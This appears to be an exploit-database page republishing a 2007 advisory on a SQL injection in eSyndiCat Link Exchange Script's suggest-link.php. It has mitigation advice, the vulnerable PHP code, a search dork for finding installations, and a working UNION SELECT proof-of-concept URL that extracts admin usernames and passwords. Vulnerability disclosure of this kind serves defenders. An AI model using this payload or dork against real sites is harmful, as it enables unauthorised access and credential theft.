header-logo
Suggest Exploit
vendor:
Link Exchange Script
by:
EgiX
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Link Exchange Script
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2007

eSyndiCat Link Exchange Script – Remote SQL Injection Advisory

An attacker can break the database through the browser by exploiting a SQL injection vulnerability in the suggest-link.php file of the eSyndiCat Link Exchange Script. By injecting a specially crafted SQL query, the attacker can retrieve sensitive information from the database, such as usernames and passwords.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Additionally, keeping the software up to date with the latest patches and security updates is important.
Source

Exploit-DB raw data:

--------------------------------------------------------------
eSyndiCat Link Exchange Script - Remote SQL Injection Advisory
--------------------------------------------------------------

author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com

link.....: http://www.esyndicat.com/
dork.....: "© 2005-2006 Powered by eSyndiCat Link Exchange Script"
details..: works with magic_quotes_gpc = off

[-] Vulnerable code in /suggest-link.php :

	30.	/** gets information about current category **/
	31.	$category =& $gDirDb->getCategoryById($_GET['id']);
	32.	$gDirSmarty->assign_by_ref('category', $category);

[-] getCategoryById function defined in /classes/Dir.php :

	323.	function getCategoryById($aCategory)
	325.	{
	326.		$sql = "SELECT * FROM `{$this->mPrefix}categories` ";
	327.		$sql .= "WHERE `id` = '{$aCategory}'";
	328.
	329.		return $this->mDb->getRow($sql);
	330.	}


[*] An attacker can break database through browser! P.o.C. :

http://[host]/[path]/suggest-link.php?id=-1'/**/UNION/**/SELECT/**/1,1,1,password,1,1,1,1,username,1,1/**/FROM/**/dir_admins/*

# milw0rm.com [2007-12-25]

Navigation

Suggest Exploit

Services By CQR